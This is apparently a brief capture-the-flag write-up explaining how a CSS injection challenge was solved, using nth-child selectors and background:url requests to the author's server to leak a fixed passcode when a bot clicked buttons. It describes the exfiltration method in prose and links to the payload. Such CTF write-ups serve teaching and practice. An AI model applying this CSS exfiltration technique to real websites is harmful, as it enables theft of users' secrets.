Tags: css xss 

Rating:

[https://gist.github.com/sqrtrev/e033c934444dc48d009ea3ed8dca54d3](https://gist.github.com/sqrtrev/e033c934444dc48d009ea3ed8dca54d3)

Firstly, I just tried to find a way for leaking the flag via css with h3 tag (because the flag is stored at h3 tag) something like css attribute selector injection.
But, when I read the code of server side, There is a passcode which is fixed using generate function. This function was just shuffling some letters and it's consist of no duplicated letters.

Therefore, once, we leak the passcode, we can use it again on our clientside for getting flag.
So, used css' nth-child for making buttons having each attribute with background: url to make a request for my server.
By submitting my payload, the bot will make me a request for each passcode when it clicks buttons.

So, we can get passcode by combining the request log

Passcode: AD14BF65EC093728

![log](https://pbs.twimg.com/media/E30idIyVcAIADt2?format=png&name=medium)

Original writeup (https://twitter.com/sqrtrev/status/1404313247281401858).